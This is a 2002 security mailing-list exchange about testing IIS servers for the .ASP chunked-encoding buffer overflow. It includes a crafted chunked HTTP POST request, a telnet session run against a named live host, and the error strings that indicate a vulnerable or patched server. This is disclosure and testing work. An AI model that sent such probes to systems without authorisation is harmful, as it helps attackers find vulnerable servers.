Re: Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]

["Riley Hassell" <rhassell () eeye com>]

It looks like it's failing with a 404 and defaulting to an error page. Run
you tests on a machine that has the default iisstart.asp file. The one
you're testing doesn't appear to.

telnet www.security.nnov.ru 80
----session---
POST /iisstart.asp HTTP/1.1
Accept: */*
Host: www.security.nnov.ru
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

1
E
0


HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Sat, 13 Apr 2002 15:27:49 GMT

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Sat, 13 Apr 2002 15:27:49 GMT
Connection: close
Content-Type: text/html
Content-Length: 1737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<script language="JavaScript">
if(top.frames[0]!=null){
        top.location.replace("/index.asp");
}
else top.location.replace(".");
</script>
<!--
<head>
        <title>?°?ß?? 404</title><link rel="STYLESHEET" type="text/cs
/style/normal.css">
....
----- Original Message -----
From: "3APA3A" <3APA3A () SECURITY NNOV RU>
To: "Riley Hassell" <rhassell () eeye com>
Cc: <vuln-dev () securityfocus com>
Sent: Saturday, April 13, 2002 1:28 AM
Subject: Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable
installations]


> Dear Riley Hassell,
>
>
> --Saturday, April 13, 2002, 2:15:47 AM, you wrote to
vuln-dev () securityfocus com:
> RH>   "POST /iisstart.asp HTTP/1.1\r\n"
> RH>   "Accept: */*\r\n"
> RH>   "Host: eeye.com\r\n"
> RH>   "Content-Type: application/x-www-form-urlencoded\r\n"
> RH>   "Transfer-Encoding: chunked\r\n"
> RH>   "\r\n"
> RH>   "1\r\n"
> RH>   "E\r\n"
> RH>   "0\r\n"
> RH>   "\r\n"
> RH>   "\r\n"
> RH>   "\r\n"
>
> In my case it produces no error and simply responses with page content
after
>    "\r\n"
>    "1\r\n"
>    "E\r\n"
>    "0\r\n"
>    "\r\n"
>
>
> RH> It won't overwrite anything mission critical so the dllhost shouldn't
lock
> RH> up or exit. If you're vulnerable then you'll the following string in
the
> RH> error message "(0x80004005)<br>Unspecified". When a server is patched
it
> RH> will respond with a new error, I believe it's
(0x80004005)<br>Request...
> RH> You can also try putting NULL's in strange places in you request. The
rollup
> RH> fixes a problem in parsing requests with NULLs. When IIS see's
something
> RH> invalid in a request it will error back with "parameter incorrect", on
an
> RH> unpatched system the responses will vary.
>
>
>
> --
> ~/ZARAZA
> ...áåç äóáèíêè íèêîãäà íå ïðèíèìàëñÿ îí çà ïðîãðàììèðîâàíèå. (Ëåì)